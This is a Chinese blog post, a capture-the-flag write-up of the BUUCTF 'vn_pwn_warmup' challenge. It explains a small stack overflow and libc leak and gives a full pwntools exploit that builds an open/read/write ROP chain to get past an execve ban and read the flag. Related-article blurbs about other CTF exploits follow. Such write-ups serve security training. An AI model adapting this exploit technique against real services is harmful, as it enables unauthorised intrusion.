vn_pwn_warmup

最新推荐文章于 2023-08-01 21:54:00 发布
最新推荐文章于 2023-08-01 21:54:00 发布
阅读量269 收藏
点赞数
分类专栏: pwn 文章标签: vn warmup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43833642/article/details/107221481
版权

在这里插入图片描述
可以看到第二个read才存在溢出,但是因为两个函数帧栈是紧挨着的,只有rbp与call指令下一条指令的地址即返回地址,这里可以溢出0x10字节大小的数据,即rbp + ret,然后就回到了第一个read所在的函数帧栈,此时可以接着利用构造rop读取flag即可…

这道题开的保护挺多的,首先栈不可执行,其次地址随机化,也就是当前elf文件每次装载到内存中的位置都是变动的,因为无法获取装载基址,所以构造的rop只能从泄露的libc中获取,同样构造的缓冲区也是libc对应的可读写位置.

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

0是标准输入,1是标准输出,2是标准错误。如果此时去打开一个新的文件,它的文件描述符会是3。
上面可以看到execve被禁用了 所以构造rop调用open read write读取flag即可…

exp

from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
proc_name = './vn_pwn_warmup'
p = process(proc_name)
p = remote('node3.buuoj.cn', 27192)
elf = ELF(proc_name)
p.recvuntil('gift: ')
puts_addr = int(p.recv(14), 16) 
log.info(hex(puts_addr))
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
read_addr = libc_base + libc.dump('read')
open_addr = libc_base + libc.dump('open')
write_addr = libc_base + libc.dump('write')

pop_rdi_ret = libc_base + 0x21102
pop_rsi_ret = libc_base + 0x202e8
pop_rdx_ret = libc_base + 0x1b92
ret = libc_base + 0x937
wr_addr = libc_base + 0x3c4000
payload = p64(0) + p64(pop_rsi_ret) + p64(wr_addr) + p64(pop_rdx_ret) + p64(0x8) + p64(read_addr) + p64(pop_rdi_ret) + p64(wr_addr) + p64(pop_rsi_ret) + p64(0) + p64(open_addr) + p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(wr_addr) + p64(pop_rdx_ret) + p64(0x30) + p64(read_addr) + p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(wr_addr) + p64(pop_rdx_ret) + p64(0x30) + p64(write_addr)                         
p.sendafter('something:', payload)
payload1 = b'a' * (0x70 + 8) + p64(pop_rdi_ret)
p.sendafter('name?', payload1)
p.send(b'./flag')
print(p.recv())

在这里插入图片描述

、moddemod
关注
专栏目录
buuctf刷题记录(一)
qq_43571856的博客
08-03 378
vn_pwn_warmup 开了nx和pie 这里给了puts的地址,可以得到libc的基地址 只有这里有个溢出点能溢出0x10个字节 原本的想法是直接用one_gadget来获得shell 但是一直都打不通,由于开了pie也没法本地调试 后来看了大佬的题解,才知道这个题禁用了execve。现在也不知道从哪里看出来的。 对于这种禁用execve或者没法使用system直接getshell的题。 我们可以使用orw来做。 可以把paylaod写到这里 然后在跳到这里执行 但是这个题没法用题目文件里的r
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
vn_pwn_warmup(利用ret滑行到rop里)
seaaseesa的博客
04-09 453
vn_pwn_warmup 首先,检查一下程序的保护机制 程序开启了沙箱保护 禁用了execve调用。 然后我们用IDA分析一下,这里没有溢出。 然后,我们进入9A1这个函数 这里可以溢出,但是仅仅能溢出0x10个字节,显然是不够我们完成open、read、write操作的。 但是,由于该函数是在9D3函数里调用,因此,9A1函数的下方就是9D3的空间。因此我...
攻防世界——pwn_warmup
syk的博客
05-28 1799
checksec:没有开启任何保护 看到了熟悉的gets()函数,通常一看到这个函数就八成有缓冲区溢出漏洞,可以看出程序为v5开辟了40H的存储空间,所以输入长度超过40H即可造成溢出,再看sprint()函数 可以看到这个函数是获取flag的关键点,程序会打印出此函数的位置,即0x40060d,到这里思路就差不多明了了,我们需要控制溢出位置,把返回地址改为此函数的地址,我们当前函数的返回值位...
vn_pwn_easyTHeap(堆利用+劫持IO_2_1_stdout的虚表)
seaaseesa的博客
04-09 1332
vn_pwn_easyTHeap 首先,已知libc版本为2.27,所以存在tcache机制,并且可以随意的double free tcache bin的chunk。 然后,我们检查一下程序的保护机制 然后,我们用IDA分析一下程序 存在UAF漏洞,因此可以double free,对于glibc 2.27,可以很轻松的利用 主函数里,对调用功能的次数做了限制,即add功能能...
gwctf_2019_easy_pwn
z1r0的博客
03-20 665
gwctf_2019_easy_pwn 查看保护 刚打开时没有看懂,只知道pertty加到一个全局变量里了。然后笔者就把ascii码跑了一遍发现I会被换成pretty,再配合后面的strcpy就存在一个溢出漏洞。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 0 if debug: r = remote('node4.buuoj.cn',
BUUCTF|PWN-warmup_csaw_2016-WP
l2645470582_的博客
07-28 471
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec warmup_csaw_2016 3、我们看到该文件是64位的文件,我们用64位IDA打开该文件 3.1、shift+f12查看该文件的关键字符串 3.2、双击关键字符串,f5进入反编译代码区 查看main函数 3.3、我们看到s和v5字符数组,查看他们所占字节 v5有溢出: r(返回地址): 关键字符串函数地址 4、编译代码 #i...
pwn_warmup
weixin_44464829的博客
10-31 385
这个题没有附件,只好nc服务器: 发现给了我们一个类似地址的东西,该怎么利用。 猜想flag应该就在这个地址,或者这个地址的附近。这里不得不提到一个方法叫做fuzz(模糊测试): Fuzzing是指通过构造测试输入,对软件进行大量测试来发现软件中的漏洞的一种模糊测试方法。在CTF中,fuzzing可能不常用,但在现实的漏洞挖掘中,fuzzing因其简单高效的优势,成为非常主流的漏洞挖掘方法。 所以额,我们要写一个函数,这个函数可以为我们生成很多地址,如果这个地址正确了,flag就会被我拿到 d
PWN学习记录(3)BUUCTF-warmup_csaw_2016
m0_58824086的博客
08-01 473
由**char v5[64]**可得,在main函数的帧中,划分了一个64字节的存储空间,也就是说只需要存入64个字节地址,就可以get函数返回地址。下载题目得到 warmup_csaw_2016,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将warmup_csaw_2016文件放入IDA中查看,打开字符串窗口。可得该文件是64位且该题任何保护都没有打开,所以我们可以实现最简单的溢出。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出这是一个关于 "AVR系列单片机Mage8PWM脉冲输出程序" 的资源。这意味着主要关注的是 AVR 系列...
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
PWM.zip_51pwm波控制LED_51控制pwn_PWN波_pwm中断_pwn呼吸灯设计
09-14
PWM,即脉宽调制(Pulse Width Modulation),是一种常用的技术,用于通过改变信号的高电平时间比例来调节输出功率或模拟信号。在51单片机中,PWM常用于控制LED亮度、电机速度以及其他模拟信号的输出。...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
用于查询libc版本函数偏移的工具
、moddemod
06-09 3126
在线查询libc版本的网站: https://libc.blukat.me/ 一个python项目LibcSearcher 项目地址:https://github.com/lieanu/LibcSearcher 安装 (下载比较慢,该项目依赖另外一个项目https://github.com/lieanu/libc-database) git clone https://github.com/lieanu/LibcSearcher.git cd LibcSearcher python setup.py de
x86与x64函数调用参数传递
、moddemod
05-26 1964
在主程序和子程序中传递参数,通常有3种方法:通过寄存器传递、通过数据区的变量传递、通过堆传递。
BUUCTF ciscn_2019_c_1
、moddemod
06-01 1276
跑一下程序,大致流程是 到现在程序就基本分析完成,接下来需要构造rop泄露libc地址然后利用system等函数获得shell 我们首先要获得libc的基地址,可以通过puts函数入手,这里解释一下为什么通过puts函数而不通过其他函数,因为puts函数在我们进入encrypt函数之前已经调用了很多次了,对于每一个动态链接而言,第一次调用完成以后,就修正了.got表中的对应的puts函数的地址,所以我们可以通过puts函数泄露。 from pwn import * from LibcSearc.
[第五空间2019 决赛]PWN5
、moddemod
06-11 1082
exp from pwn import * # sh = remote('node3.buuoj.cn', 29382) context.log_level = 'debug' proc_name = './pwn' sh = process(proc_name) unk_804C044 = 0x804C044 payload = p32(unk_804C044) + p32(unk_804C044 + 1) + p32(unk_804C044 + 2) + p32(unk_804C044 + ...
xdctf2015_pwn200
最新发布
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值